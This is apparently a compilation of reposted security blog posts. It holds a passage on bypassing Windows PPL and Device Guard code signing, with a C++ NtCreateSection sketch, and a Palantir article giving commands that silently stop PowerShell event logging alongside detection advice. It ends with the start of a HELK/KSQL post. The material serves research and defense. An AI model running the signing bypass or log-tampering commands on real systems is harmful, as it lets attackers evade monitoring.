After discussing this a bit with Alex Ionescu I decided to put together a quick parser, with information from Alex, for the cached signing data on a file. This is exposed in NtObjectManager as the Get-NtCachedSigningLevel command. I ran this command against a fake signed binary and a system binary which was also cached signed and immediately noticed a difference:

For the fake signed file the Flags are set to TrustedSignature (0x02), however for the system binary PowerShell couldn’t decode the enumeration and so just outputs the integer value of 66 which is 0x42 in hex. The value 0x40 was an extra flag on top of the original trusted signature flag. It seemed likely that without this flag set the DLL wouldn’t be loaded into a PPL process. Something must be setting this flag so I decided to check what happened if I loaded a valid cached signed DLL without the extra flag into a PPL process. Monitoring it in Process Monitor I got my answer:

The Process Monitor trace shows that first the kernel queries for the Extended Attributes (EA) from the DLL. The cached signing level data is stored in the file’s EA so this is almost certainly an indication of the cached signing level being read. In the full trace artifacts of checking the full signature are shown such as enumerating catalog files, I’ve removed those artifacts from the screenshot for brevity. Finally the EA is set, if I check the cached signing level of the file it now includes the extra flag. So setting the cached signing level is done automatically, the question is how? By pulling up the stack trace we can see how it happens:

Looking at the middle of the stack trace we can see the call to CipSetFileCache originates from the call to NtCreateSection. The kernel is automatically caching the signature when it makes sense to do so, e.g. in a PPL, so that subsequent image mappings don’t need to recheck the signature. It’s possible to map an image section from a file with write access, so we can reuse the same attack from Issue 1332 and replace the call to NtSetCachedSigningLevel with NtCreateSection, and we can fake sign any DLL. It turned out that the call to set the file cache happened after the write check introduced to fix Issue 1332 and so it was possible to use this to bypass Device Guard again. For that reason I reported the bypass as Issue 1597 which was fixed in September 2018 as CVE-2018-8449. However, as with Issue 1332 the back door for PPL is still in place, so even though the fix eliminated the Device Guard bypass it can still be used to get us from PPL-CodeGen to PPL-WindowsTCB.
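The bypass described here boils down to creating an image section over a file that is still writable, letting the kernel cache the signing level as a side effect. A minimal sketch of that idea follows; it must run inside a PPL for the cached level to be trusted, the NtCreateSection prototype is declared by hand since it is not in the public headers, and this is a simplification of the actual exploit.

#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

// NtCreateSection is exported by ntdll but not declared in the SDK headers.
extern "C" NTSTATUS NTAPI NtCreateSection(
    PHANDLE SectionHandle, ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes, PLARGE_INTEGER MaximumSize,
    ULONG SectionPageProtection, ULONG AllocationAttributes,
    HANDLE FileHandle);

// Sketch: keep the file open for write while mapping it as an image section.
// In a PPL the kernel's section-creation path calls CipSetFileCache, storing
// the cached signing level in the file's extended attributes.
bool TriggerCacheSigning(const wchar_t* path) {
  HANDLE hFile = CreateFileW(path, GENERIC_READ | GENERIC_WRITE,
                             FILE_SHARE_READ, nullptr, OPEN_EXISTING, 0,
                             nullptr);
  if (hFile == INVALID_HANDLE_VALUE)
    return false;
  HANDLE hSection = nullptr;
  NTSTATUS status = NtCreateSection(&hSection, SECTION_MAP_EXECUTE, nullptr,
                                    nullptr, PAGE_EXECUTE, SEC_IMAGE, hFile);
  if (hSection)
    CloseHandle(hSection);
  CloseHandle(hFile);
  return status >= 0;  // NT_SUCCESS
}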

Conclusions

This blog showed how I was able to inject arbitrary code into a PPL without requiring administrator privileges. What could you do with this newfound power? Actually not a great deal as a normal user, but there are some parts of the OS, such as the Windows Store, which rely on PPL to secure files and resources which you can’t modify as a normal user. If you elevate to administrator and then inject into a PPL you’ll get many more things to attack, such as CSRSS (through which you can certainly get kernel code execution) or Windows Defender which runs as PPL Anti-Malware. Over time I’m sure the majority of the use cases for PPL will be replaced with Virtual Secure Mode (VSM) and Isolated User Mode (IUM) applications which have greater security guarantees and are also considered security boundaries that Microsoft will defend and fix.

Did I report these issues to Microsoft? Microsoft has made it clear that they will not fix issues only affecting PP and PPL in a security bulletin. Without a security bulletin the researcher receives no acknowledgement for the find, such as a CVE. The issue will not be fixed in current versions of Windows, although it might be fixed in the next major version. Previously, confirming Microsoft’s policy on fixing a particular security issue was based on precedent, however they’ve recently published a list of Windows technologies that will or will not be fixed in the Windows Security Service Criteria which, as shown below for Protected Process Light, states that Microsoft will not fix or pay a bounty for issues relating to the feature. Therefore, from now on I will not be engaging Microsoft if I discover issues which I believe to only affect PP or PPL.

The one bug I reported to Microsoft was only fixed because it could be used to bypass Device Guard. When you think about it, only fixing for Device Guard is somewhat odd. I can still bypass Device Guard by injecting into a PPL and setting a cached signing level, and yet Microsoft won’t fix PPL issues but will fix Device Guard issues. Much as the Windows Security Service Criteria document really helps to clarify what Microsoft will and won’t fix it’s still somewhat arbitrary. A secure feature is rarely secure in isolation, the feature is almost certainly secure because other features enable it to be so.
In part 2 of this blog we’ll go into how I was also able to break into Full PP-WindowsTCB processes using another interesting feature of COM.

Tampering with Windows Event Tracing: Background, Offense, and Defense

( Original text by Palantir )

Event Tracing for Windows (ETW) is the mechanism Windows uses to trace and log system events. Attackers often clear event logs to cover their tracks. Though the act of clearing an event log itself generates an event, attackers who know ETW well may take advantage of tampering opportunities to cease the flow of logging temporarily or even permanently, without generating any event log entries in the process.

The Windows event log is the data source for many of the Palantir Critical Incident Response Team’s Alerting and Detection Strategies, so familiarity with event log tampering tradecraft is foundational to our success. We continually evaluate our assumptions regarding the integrity of our event data sources, document our blind spots, and adjust our implementation. The goal of this blog post is to share our knowledge with the community by covering ETW background and basics, stealthy event log tampering techniques, and detection strategies.

Introduction to ETW and event logging

The ETW architecture differentiates between event providers, event consumers, and event tracing sessions. Tracing sessions are responsible for collecting events from providers and for relaying them to log files and consumers. Sessions are created and configured by controllers like the built-in logman.exe command line utility. Here are some useful commands for exploring existing trace sessions and their respective ETW providers; note that these must usually be executed from an elevated context.

List all running trace sessions

> logman query -ets
Data Collector Set                Type    Status
-------------------------------------------------
Circular Kernel Context Logger Trace Running
AppModel Trace Running
ScreenOnPowerStudyTraceSession Trace Running
DiagLog Trace Running
EventLog-Application Trace Running
EventLog-System Trace Running
LwtNetLog Trace Running
NtfsLog Trace Running
TileStore Trace Running
UBPM Trace Running
WdiContextLog Trace Running
WiFiSession Trace Running
UserNotPresentTraceSession Trace Running
Diagtrack-Listener Trace Running
MSDTC_TRACE_SESSION Trace Running
WindowsUpdate_trace_log Trace Running

List all providers that a trace session is subscribed to

> logman query "EventLog-Application" -ets
Name:                 EventLog-Application
Status: Running
Root Path: %systemdrive%\PerfLogs\Admin
Segment: Off
Schedules: On
Segment Max Size: 100 MB

Name: EventLog-Application\EventLog-Application
Type: Trace
Append: Off
Circular: Off
Overwrite: Off
Buffer Size: 64
Buffers Lost: 0
Buffers Written: 242
Buffer Flush Timer: 1
Clock Type: System
File Mode: Real-time

Provider:
Name: Microsoft-Windows-SenseIR
Provider Guid: {B6D775EF-1436-4FE6-BAD3-9E436319E218}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x8000000000000000 (Microsoft-Windows-SenseIR/Operational)
Properties: 65
Filter Type: 0

Provider:
Name: Microsoft-Windows-WDAG-Service
Provider Guid: {728B02D9-BF21-49F6-BE3F-91BC06F7467E}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x8000000000000000
Properties: 65
Filter Type: 0

...

Provider:
Name: Microsoft-Windows-PowerShell
Provider Guid: {A0C1853B-5C40-4B15-8766-3CF1C58F985A}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x9000000000000000 (Microsoft-Windows-PowerShell/Operational,Microsoft-Windows-PowerShell/Admin)
Properties: 65
Filter Type: 0

This command details the configuration of the trace session itself, followed by the configuration of each provider that the session is subscribed to, including the following parameters:

  • Name: The name of the provider. A provider only has a name if it has a registered manifest, but it always has a unique GUID.
  • Provider GUID: The unique GUID for the provider. The GUID and/or name of a provider is useful when performing research or operations on a specific provider.
  • Level: The logging level specified. Standard logging levels are: 0 — Log Always; 1 — Critical; 2 — Error; 3 — Warning; 4 — Informational; 5 — Verbose. Custom logging levels can also be defined, but levels 6–15 are reserved. More than one logging level can be captured by ORing respective levels; supplying 255 (0xFF) is the standard method of capturing all supported logging levels.
  • KeywordsAll: Keywords are used to filter specific categories of events. While logging level is used to filter by event verbosity/importance, keywords allow filtering by event category. A keyword corresponds to a specific bit value. All indicates that, for a given keyword matched by KeywordsAny, further filtering should be performed based on the specific bitmask in KeywordsAll. This field is often set to zero. More information on All vs. Any can be found here.
  • KeywordsAny: Enables filtering based on any combination of the keywords specified. This can be thought of as a logical OR where KeywordsAll is a subsequent application of a logical AND. The low six bytes refer to keywords specific to the provider. The high two bytes are reserved and defined in WinMeta.xml in the Windows SDK. For example, in event log-related trace sessions, you will see the high byte (specifically, the high nibble) set to a specific value. This corresponds to one or more event channels, where the following channels are defined:
0x01 - Admin channel
0x02 - Debug channel
0x04 - Analytic channel
0x08 - Operational channel
  • Properties: This refers to optional ETW properties that can be specified when writing the event. The following values are currently supported (more information here):
0x001 - EVENT_ENABLE_PROPERTY_SID
0x002 - EVENT_ENABLE_PROPERTY_TS_ID
0x004 - EVENT_ENABLE_PROPERTY_STACK_TRACE
0x008 - EVENT_ENABLE_PROPERTY_PSM_KEY
0x010 - EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0
0x020 - EVENT_ENABLE_PROPERTY_PROVIDER_GROUP
0x040 - EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0
0x080 - EVENT_ENABLE_PROPERTY_PROCESS_START_KEY
0x100 - EVENT_ENABLE_PROPERTY_EVENT_KEY
0x200 - EVENT_ENABLE_PROPERTY_EXCLUDE_INPRIVATE

From a detection perspective, EVENT_ENABLE_PROPERTY_SID, EVENT_ENABLE_PROPERTY_TS_ID, and EVENT_ENABLE_PROPERTY_PROCESS_START_KEY are valuable fields to collect. For example, EVENT_ENABLE_PROPERTY_PROCESS_START_KEY generates a value that uniquely identifies a process; note that Process IDs are not unique identifiers for a process instance. (A quick way to check which providers in a session request these properties is sketched just after this list of parameters.)

  • Filter Type: Providers can optionally choose to implement additional filtering; supported filters are defined in the provider manifest. In practice, none of the built-in providers implement filters, as confirmed by running TdhEnumerateProviderFilters over all registered providers. There are some predefined filter types defined in eventprov.h (in the Windows SDK):
0x00000000 - EVENT_FILTER_TYPE_NONE
0x80000000 - EVENT_FILTER_TYPE_SCHEMATIZED
0x80000001 - EVENT_FILTER_TYPE_SYSTEM_FLAGS
0x80000002 - EVENT_FILTER_TYPE_TRACEHANDLE
0x80000004 - EVENT_FILTER_TYPE_PID
0x80000008 - EVENT_FILTER_TYPE_EXECUTABLE_NAME
0x80000010 - EVENT_FILTER_TYPE_PACKAGE_ID
0x80000020 - EVENT_FILTER_TYPE_PACKAGE_APP_ID
0x80000100 - EVENT_FILTER_TYPE_PAYLOAD
0x80000200 - EVENT_FILTER_TYPE_EVENT_ID
0x80000400 - EVENT_FILTER_TYPE_EVENT_NAME
0x80001000 - EVENT_FILTER_TYPE_STACKWALK
0x80002000 - EVENT_FILTER_TYPE_STACKWALK_NAME
0x80004000 - EVENT_FILTER_TYPE_STACKWALK_LEVEL_KW
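As referenced above, the enable properties that a session requests from each provider are useful for detection engineering. A minimal sketch for listing which providers in the Application event log session request the SID or process start key properties, using the Get-EtwTraceProvider cmdlet from the EventTracingManagement module shown later in this post (treat the property-name matching as an assumption to adapt to your environment):

# List EventLog-Application providers whose EnableProperty includes
# EVENT_ENABLE_PROPERTY_SID or EVENT_ENABLE_PROPERTY_PROCESS_START_KEY (sketch).
Get-EtwTraceProvider -SessionName EventLog-Application |
    Where-Object { "$($_.EnableProperty)" -match 'SID|PROCESS_START_KEY' } |
    Select-Object Guid, EnableProperty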

Enumerating all registered ETW providers

The logman query providers command lists all registered ETW providers, supplying their name and GUID. An ETW provider is registered if it has a binary manifest stored in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{PROVIDER_GUID} registry key. For example, the Microsoft-Windows-PowerShell provider has the following registry values:
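The original post shows these values as a screenshot; a quick way to pull them yourself (the GUID is the PowerShell provider GUID from the trace session listing above) is:

# Inspect the manifest registration for the Microsoft-Windows-PowerShell provider;
# the ResourceFileName value points at the binary carrying the WEVT_TEMPLATE resource.
Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'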

ETW and the event log know how to properly parse and display event information to a user based on binary-serialized information in the WEVT_TEMPLATE resource present in the binaries listed in the ResourceFileName registry value. This resource is a binary representation of an instrumentation manifest (i.e., the schema for an ETW provider). The binary structure of WEVT_TEMPLATE is under-documented, but there are at least two tools available to assist in parsing and recovering event schema: WEPExplorer and PerfView.

Viewing an individual provider

The logman tool prints basic information about a provider. For example:
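The original screenshot is omitted here; the command itself, using the PowerShell provider as an example, is:

>

logman query providers Microsoft-Windows-PowerShell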

The listing shows supported keywords and logging values, as well as all processes that are registered to emit events via this provider. This output is useful for understanding how existing trace sessions filter on providers. It is also useful for initial discovery of potentially interesting information that could be gathered via an ETW trace.

Notably, the PowerShell provider appears to support logging to the event log based on the presence of the reserved keywords in the high nibble of the defined keywords. Not all ETW providers are designed to be ingested into the event log; rather, many ETW providers are intended to be used solely for low-level tracing, debugging, and, more recently, security telemetry purposes. For example, Windows Defender Advanced Threat Protection relies heavily upon ETW as a supplemental detection data source.

Viewing all providers that a specific process is sending events to

Another method for discovering potentially interesting providers is to view all providers to which events are written from a specific process. For example, the following listing shows all providers relevant to MsMpEng.exe (the Windows Defender service, running as pid 5244 in this example):
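The screenshot of that listing is omitted here; the underlying command is logman's per-process query (the PID below is specific to that example):

>

logman query providers -pid 5244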

Entries listed only by GUID are providers lacking a manifest. They will typically be related to WPP or TraceLogging, both of which are beyond the scope of this blog post. It is possible to retrieve provider names and event metadata for these provider types. For example, here are some of the resolved provider names from the unnamed providers above:

  • 05F95EFE-7F75-49C7-A994-60A55CC09571
    Microsoft.Windows.Kernel.KernelBase
  • 072665FB-8953-5A85-931D-D06AEAB3D109
    Microsoft.Windows.ProcessLifetimeManage
  • 7AF898D7-7E0E-518D-5F96-B1E79239484C
    Microsoft.Windows.Defender

Event provider internals

Looking at ETW-related code snippets in built-in Windows binaries can help you understand how ETW events are constructed and how they surface in event logs. Below, we highlight two code samples: System.Management.Automation.dll (the core PowerShell assembly) and amsi.dll.

System.Management.Automation.dll event tracing

One of the great security features of PowerShell version 5 is scriptblock autologging; when enabled, script content is automatically logged to the Microsoft-Windows-PowerShell/Operational event log with event ID 4104 (warning level) if the scriptblock contains any suspicious terms. The following C# code is executed to generate the event log:

From PowerShell

The LogOperationalWarning method is implemented as follows:

From PowerShell

The WriteEvent method is implemented as follows:

From PowerShell

Finally, the event information is marshaled and EventWriteTransfer is called, supplying the Microsoft-Windows-PowerShell provider with event data.

The relevant data supplied to EventWriteTransfer is as follows:

  • Microsoft-Windows-PowerShell provider GUID: 
    {A0C1853B-5C40-4b15-8766-3CF1C58F985A}
  • Event ID: 
    PSEventId.ScriptBlock_Compile_Detail - 4104
  • Channel value: 
    PSChannel.Operational - 16
    Again, the usage of a channel value indicates that the provider is intended to be used with the event log. The operational channel definition for the PowerShell ETW manifest can be seen here. When an explicit channel value is not supplied, Message Compiler (mc.exe) will assign a default value starting at 16. Since the operational channel was defined first, it was assigned 16.
  • Opcode value: 
    PSOpcode.Create - 15
  • Logging level: 
    PSLevel.Warning - 3
  • Task value: 
    PSTask.CommandStart - 102
  • Keyword value: 
    PSKeyword.UseAlwaysAnalytic - 0x4000000000000000
    This value is later translated to 0, as seen in the code block above. Normally, this event would not be logged, but the Application event log trace session specifies the EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 enable flag for all of its providers, which causes the event to be logged despite no keyword value being specified.
  • Event data: the scriptblock contents and event fields

Upon receiving the event from the PowerShell ETW provider, the event log service parses the binary WEVT_TEMPLATE schema (original XML schema) and presents human-readable, parsed event properties/fields:

amsi.dll event tracing

You may have observed that Windows 10 has an AMSI/Operational event log that is typically empty. To understand why events are not logged to this event log, you would first have to inspect how data is fed to the AMSI ETW provider (Microsoft-Antimalware-Scan-Interface - {2A576B87-09A7-520E-C21A-4942F0271D67}) and then observe how the Application event log trace session (EventLog-Application) subscribes to the AMSI ETW provider. Let's start by looking at the provider registration in the Application event log. The following PowerShell cmdlet will supply us with this information:

>

Get-EtwTraceProvider -SessionName EventLog-Application -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}'
SessionName     : EventLog-Application
Guid : {2A576B87-09A7-520E-C21A-4942F0271D67}
Level : 255
MatchAnyKeyword : 0x8000000000000000
MatchAllKeyword : 0x0
EnableProperty : {EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0, EVENT_ENABLE_PROPERTY_SID}

The following properties should be noted:

  • Operational channel events (as indicated by 0x8000000000000000 in the MatchAnyKeyword value) are captured.
  • All logging levels are captured.
  • Events should be captured even if an event keyword value is zero, as indicated by the EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 flag.

This information on its own does not explain why AMSI events are not logged, but it supplies needed context for inspecting how amsi.dll writes events to ETW. By loading amsi.dll into IDA, we can see that there is a single call to the EventWrite function within the internal CAmsiAntimalware::GenerateEtwEvent function:

The relevant portion of the call to EventWrite is the EventDescriptor argument. Upon applying the EVENT_DESCRIPTOR structure type to _AMSI_SCANBUFFER, the following information was interpreted:

The EVENT_DESCRIPTOR context gives us the relevant information:

  • Event ID: 
    1101 (0x44D)
    This event's details can be extracted from a recovered manifest as seen here.
  • Channel: 
    16 (0x10), referring to the operational event log channel
  • Level: 4 (Informational)
  • Keyword: 
    0x8000000000000001 (AMSI/Operational OR Event1). These values are interpreted by running the logman query providers Microsoft-Antimalware-Scan-Interface command.

We now understand that 1101 events are not logged to the Application event log because the session only considers events where the keyword value matches 0x8000000000000000. In order to fix this issue and get events flowing into the event log, either the Application event log trace session would need to be modified (not recommended, and requiring SYSTEM privileges) or you could create your own persistent trace session (e.g., an autologger) to capture AMSI events in the event log. The following PowerShell script creates such a trace session:

$AutoLoggerGuid = "{$((New-Guid).Guid)}"
New-AutologgerConfig -Name MyCustomAutoLogger -Guid $AutoLoggerGuid -Start Enabled
Add-EtwTraceProvider -AutologgerName MyCustomAutoLogger -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41

After running the above commands and rebooting, the AMSI event log will begin to populate.

Some additional reverse engineering showed that the scanResult field refers to the AMSI_RESULT enum where, in this case, 32768 maps to AMSI_RESULT_DETECTED, indicating that the buffer (the Unicode-encoded buffer in the content field) was determined to be malicious.

Without knowledge of ETW internals, a defender would not have been able to determine that additional data sources (the AMSI log in this case) can be fed into the event log. One would have to resort to speculation as to how the AMSI event came to be misconfigured and whether or not the misconfiguration was intentional.

ETW tampering techniques

If the goal of an attacker is to subvert event logging, ETW provides a stealthy mechanism to affect logging without itself generating an event log trail. Below is a non-exhaustive list of tampering techniques that an attacker can use to cut off the supply of events to a specific event log.

Tampering techniques can generally be broken down into two categories:

  1. Persistent, requiring reboot — i.e., a reboot must occur before the attack takes effect. Changes can be reverted, but would require another reboot. These attacks involve altering autologger settings — persistent ETW trace sessions with settings in the registry. There are more types of persistent attacks than ephemeral attacks, and they are usually more straightforward to detect.
  2. Ephemeral — i.e., where the attack can take place without a reboot.

Autologger provider removal

Tampering category: Persistent, requiring reboot
Minimum permissions required: Administrator
Detection artifacts: Registry key deletion: 

HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}


Description: This technique involves the removal of a provider entry from a configured autologger. Removing a provider registration from an autologger will cause events to cease to flow to the respective trace session.
 
Example: The following PowerShell code disables Microsoft-Windows-PowerShell event logging:

Remove-EtwTraceProvider -AutologgerName EventLog-Application -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'

In the above example, A0C1853B-5C40-4B15-8766-3CF1C58F985A refers to the Microsoft-Windows-PowerShell ETW provider. This command will end up deleting the HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\{a0c1853b-5c40-4b15-8766-3cf1c58f985a} registry key.
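To revert the change (or to exercise detection logic in a lab), the provider entry can presumably be re-added with the companion cmdlet used for the AMSI autologger above; the keyword, level, and property values below mirror the EventLog-Application defaults shown earlier in this post:

Add-EtwTraceProvider -AutologgerName EventLog-Application -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}' -Level 0xff -MatchAnyKeyword 0x9000000000000000 -Property 0x41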

Provider “Enable” property modification

Tampering category: Persistent, requiring reboot
Minimum permissions required: Administrator
Detection artifacts: Registry value modification: 

HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID} - EnableProperty (REG_DWORD)


Description: This technique involves altering the Enable keyword of an autologger session. For example, by default, all ETW provider entries in the EventLog-Application autologger session are set to 0x41, which translates to EVENT_ENABLE_PROPERTY_SID and EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0. EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 is not documented; it specifies that any events generated for a provider should be logged even if the keyword value is set to 0. An attacker could swap out EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 for EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0, resulting in a value of 0x11, which would cause all events where the keyword is 0 not to be logged. For example, PowerShell eventing supplies a 0 keyword value with its events, resulting in no logging to the PowerShell event log.

Example: The following PowerShell code disables Microsoft-Windows-PowerShell event logging:

Set-EtwTraceProvider -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}' -AutologgerName 'EventLog-Application' -Property 0x11

In the above example, A0C1853B-5C40-4B15-8766-3CF1C58F985A refers to the Microsoft-Windows-PowerShell ETW provider. This command will end up setting HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\EnableProperty to 0x11. Upon rebooting, events will cease to be reported to the PowerShell event log.
 
An attacker is not constrained to using just the Set-EtwTraceProvider cmdlet to carry out this attack; an attacker could simply modify the value directly in the registry. Set-EtwTraceProvider merely offers a convenient autologger configuration abstraction.
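A direct registry equivalent of the same change (path, value name, and data taken from the description above) might look like this:

# Set the EnableProperty value for the PowerShell provider entry directly in the registry.
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\{a0c1853b-5c40-4b15-8766-3cf1c58f985a}' -Name EnableProperty -Value 0x11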

Alternative detection artifacts/ideas: If possible, it is advisable to monitor for modifications of values within the HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID} registry key. Note that modifying EnableProperty is just one specific example and that an attacker can alter ETW providers in other ways, too.

ETW provider removal from a trace session

Tampering category: Ephemeral
Minimum permissions required: SYSTEM
Detection artifacts: Unfortunately, no file, registry, or event log artifacts are associated with this technique. While the example below uses logman.exe to perform the attack, an attacker can obfuscate their activity by using Win32 APIs directly, WMI, DCOM, PowerShell, etc.
 
Description: This technique involves removing an ETW provider from a trace session, cutting off its ability to supply a targeted event log with events until a reboot occurs, or until the attacker restores the provider. While an attacker must have SYSTEM privileges to perform this attack, it is unlikely that defenders will notice such an attack if they rely on event logs for threat detection.
 
Example: The following PowerShell code immediately disables Microsoft-Windows-PowerShell event logging until a reboot occurs or the attacker restores the ETW provider:


logman update trace EventLog-Application --p Microsoft-Windows-PowerShell -ets
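Until the reboot that re-applies the autologger configuration, the provider can presumably be restored to the live session with the positive form of the same command; the keyword and level values below mirror the session configuration shown earlier in this post:

logman update trace EventLog-Application -p Microsoft-Windows-PowerShell 0x9000000000000000 0xff -ets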

Alternative detection artifacts/ideas:

  • Event ID 12 within the Microsoft-Windows-Kernel-EventTracing/Analytic log indicates when a trace session is modified, but it doesn’t supply the provider name or GUID that was removed, so it would be difficult to confidently determine whether or not something suspicious occurred using this event.
  • There have been several references thus far to the ETW PowerShell cmdlets housed in the EventTracingManagement module, which itself is a CDXML-based module. This means that all the cmdlets in EventTracingManagement are backed by WMI classes. For example, the Get-EtwTraceProvider cmdlet is backed by the ROOT/Microsoft/Windows/EventTracingManagement:MSFT_EtwTraceProvider class. Considering ETW providers can be represented in the form of WMI class instances, you could craft a permanent WMI event subscription that logs all provider removals from a specific trace session to the event log. The referenced code sample creates an NtEventLogEventConsumer instance that logs event ID 8 to the Application event log (source: WSH) any time a provider is removed from the Application event log trace session, EventLog-Application. A rough sketch of such a subscription appears after this list. The logged event looks like the following:
  • The frequency at which providers are removed from Application event logs in large environments is not currently known. As a fallback, it is still advised to log the execution of logman.exe, wpr.exe, and PowerShell in your environment.
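The following is a rough, untested sketch of the kind of permanent WMI event subscription described above. The class and property names follow the standard root\subscription eventing classes; the WQL polling interval, the event type, and the insertion-string template are assumptions you would want to validate before relying on it:

# Sketch: log an Application event (ID 8, source WSH) whenever a provider instance is
# removed from the EventLog-Application trace session. Untested; adjust to your environment.
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
    Name           = 'EventLogApplicationProviderRemoval'
    EventNamespace = 'root/Microsoft/Windows/EventTracingManagement'
    QueryLanguage  = 'WQL'
    Query          = "SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE TargetInstance ISA 'MSFT_EtwTraceProvider' AND TargetInstance.SessionName = 'EventLog-Application'"
}

$Consumer = Set-WmiInstance -Namespace root\subscription -Class NtEventLogEventConsumer -Arguments @{
    Name                     = 'EventLogApplicationProviderRemovalConsumer'
    SourceName               = 'WSH'
    EventID                  = [UInt32] 8
    EventType                = [UInt32] 2   # assumption: 2 = Warning
    Category                 = [UInt16] 0
    NumberOfInsertionStrings = [UInt32] 1
    InsertionStringTemplates = @('ETW provider %TargetInstance.Guid% was removed from trace session %TargetInstance.SessionName%')
}

# Bind the filter to the consumer so the subscription becomes active.
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
    Filter   = $Filter
    Consumer = $Consumer
} | Out-Null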

Conclusion

Identifying blind spots and assumptions in Alerting and Detection Strategies is a crucial step in ensuring the resilience of detections. Since ETW is at the core of the event logging infrastructure, gaining an in-depth understanding of ETW tampering attacks is a valuable way to increase the integrity of security-related data sources.

Further Reading

Real-Time Sysmon Processing via KSQL and HELK — Part 1: Initial Integration

( Original text by Roberto Rodriguez )

During a recent talk titled “Hunters ATT&CKing with the Right Data” that I gave with my brother Jose Luis Rodriguez @Cyb3rPandaH at ATT&CKcon, we talked about the importance of documenting and modeling security event logs before developing any data analytics while preparing for a threat hunting engagement. Defining relationships among Windows security event logs such as Sysmon, for example, helped us to appreciate the extra context that two or more events together can provide for a hunt. Therefore, I was wondering if there was anything that I could do with my project HELK to apply some of the relationships presented in our talk, and enrich the data collected from my endpoints in real-time.

This post is part of a three-part series. In this first one, I will introduce the initial integration of a new application named KSQL into the HELK ecosystem in order to enable a SQL interface for stream processing on top of the Kafka platform already provided by HELK. In the other two posts, I will go over a basic example of a JOIN statement with Sysmon Event ID 1 (Process Creation) and Sysmon Event ID 3 (Network Connection), and show you how useful it could be during a hunting engagement.

What is KSQL?

KSQL is the open source streaming SQL engine for Apache Kafka®. It provides an easy-to-use yet powerful interactive SQL interface for stream processing on Kafka, without the need to write code in a programming language such as Java or Python. KSQL is scalable, elastic, fault-tolerant, and real-time. It supports a wide range of streaming operations, including data filtering, transformations, aggregations, joins, windowing, and sessionization.

KSQL is implemented on top of the Kafka Streams API, which means that KSQL queries are compiled into Kafka Streams applications.

What is “Kafka Streams”?

Kafka Streams is a JVM client library used to develop stream processing applications that leverage data stored in Kafka clusters. Remember that stream processing applications do not run inside Kafka nodes. Instead, Kafka Streams applications read from topics available on Kafka nodes, process the data in their own internal stream processors, and write the results back to the same or a new topic in the Kafka cluster.

This concept is what makes KSQL flexible and easy to use with current Kafka cluster deployments.

What is a Stream?

A stream is the most important abstraction provided by Kafka Streams: it represents an unbounded, continuously updating data set, where unbounded means “of unknown or of unlimited size.”

Think of a stream as a sequence of data records ordered by time in a key-value format that can be queried for further analysis. One example could be messages from a Kafka topic that stores information about process creations on specific endpoints in your network, as shown below.

KSQL: SQL interface for stream processing?

Essentially, KSQL allows you to easily execute SQL-like queries on top of streams flowing from Kafka topics. KSQL queries get translated to Java code via the Kafka Streams API, reducing the complexity of writing many lines of Java code for real-time stream processing. Our basic design then would look like the following:

KSQL and SQL JOIN?

Now that we have gained some understanding of KSQL, let's define one of the SQL capabilities provided by KSQL that will be helpful for this post: the SQL JOIN. KSQL join operations merge streams and/or tables on common data key values, producing new streams or tables in real time.

Streams vs Tables

Once again, streams are a never-ending sequence of data records ordered by time that represent the past and the present state of data ingested into a Kafka topic. One can access a stream from the beginning of its time all the way to the most recently recorded values. Tables, on the other hand, represent only the up-to-date state of data records. For example, if DHCP logs are being collected, you can have a table that keeps the most up-to-date mapping between an IP address and a domain computer in your environment. Meanwhile, you can query the DHCP logs stream and access past IP addresses assigned to workstations in your network.

According to the Confluent Developers Guide, you can join streams and tables in the following way:

INNER, LEFT OUTER & FULL OUTER JOINS?

Inner Join: It returns data records that have matching values in both sources

Left Outer Join: It returns data records from the left source and the matched data records from the right source

Full Outer Join: It returns data records when there is a match in either left or right source

I hope this small review of KSQL and the concepts around Kafka Streams was helpful in getting you familiar with the technology being added to HELK.

Why KSQL and HELK?

As I mentioned at the beginning of this post, I wanted to find a way to enrich Windows Sysmon event logs by applying the relationships identified within the information it provides. From an infrastructure perspective, I already collect Sysmon event logs from my Windows endpoints and publish them directly to a Kafka topic named winlogbeat in HELK. Therefore, after what we just learned about KSQL, it will be very easy to use it with the current HELK Kafka deployment and apply a Sysmon data model via join operations in real-time.

What is a data model?

